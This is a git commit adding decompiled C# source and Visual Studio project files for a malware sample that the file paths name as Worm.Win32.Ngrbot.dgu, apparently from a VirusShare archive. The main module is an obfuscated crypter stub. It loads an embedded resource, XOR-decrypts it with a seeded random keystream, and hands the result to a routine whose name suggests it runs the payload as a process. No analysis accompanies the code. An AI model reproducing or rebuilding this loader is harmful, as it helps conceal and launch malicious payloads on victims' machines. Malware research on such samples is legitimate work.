auto-decompiled msil via petikvx

add
2026-06-17 00:09:23 +00:00 · 2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,53 @@
+// Decompiled with JetBrains decompiler
+// Type: ƀƚąƫcħ.Module1
+// Assembly: NoStartUp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 14163617-1CB3-4844-9F67-2DC4A344E71C
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.exe
+
+using Microsoft.VisualBasic.CompilerServices;
+using System;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+
+namespace ƀƚąƫcħ
+{
+  [StandardModule]
+  internal sealed class Module1
+  {
+    [DllImport("kernel32.dll", SetLastError = true)]
+    private static extern IntPtr FindResource(IntPtr ħМøƋυƪȝ, string ƪƥŊąɱȝ, string ƪƥƬƴƥȝ);
+
+    [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
+    private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
+
+    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
+    private static extern IntPtr LoadResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
+
+    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
+    private static extern int SizeofResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
+
+    [DllImport("kernel32", EntryPoint = "CopyFileA", CharSet = CharSet.Ansi, SetLastError = true)]
+    private static extern long CopyFile([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpExistingFileName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpNewFileName);
+
+    [STAThread]
+    public static void main()
+    {
+      string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
+      IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
+      IntPtr resource = Module1.FindResource(moduleHandle, "0", "RT_RCDATA");
+      IntPtr source = Module1.LoadResource(moduleHandle, resource);
+      int length = Module1.SizeofResource(moduleHandle, resource);
+      byte[] numArray = new byte[length - 1 + 1 - 1 + 1];
+      Marshal.Copy(source, numArray, 0, length);
+      int int32_1 = BitConverter.ToInt32(numArray, Convert.ToInt32(numArray.Length - 4));
+      byte[] Ƌąƫą = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[numArray.Length - 3 + 1 - 1 + 1]);
+      Random random = new Random(int32_1);
+      byte[] buffer = new byte[Ƌąƫą.Length - 1 + 1 - 1 + 1];
+      random.NextBytes(buffer);
+      int int32_2 = Convert.ToInt32(Ƌąƫą.Length - 1);
+      for (int index = 0; index <= int32_2; ++index)
+        Ƌąƫą[index] = Convert.ToByte((byte) ((int) Ƌąƫą[index] ^ (int) buffer[index]));
+      Ʀυŋƥȝƪąƨƨ.ƦυŋƥȝƧυƀ(Ƌąƫą, Process.GetCurrentProcess().MainModule.ModuleName);
+    }
+  }
+}
@@ -0,0 +1,42 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{134983AD-9031-49A8-A29E-E976A034C1CB}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>NoStartUp</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+    <RootNamespace>ƀƚąƫcħ</RootNamespace>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.VisualBasic" />
+    <Reference Include="System" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Module1.cs" />
+    <Compile Include="Ʀυŋƥȝƪąƨƨ.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "NoStartUp", "Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.csproj", "{134983AD-9031-49A8-A29E-E976A034C1CB}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{134983AD-9031-49A8-A29E-E976A034C1CB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{134983AD-9031-49A8-A29E-E976A034C1CB}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{134983AD-9031-49A8-A29E-E976A034C1CB}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{134983AD-9031-49A8-A29E-E976A034C1CB}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal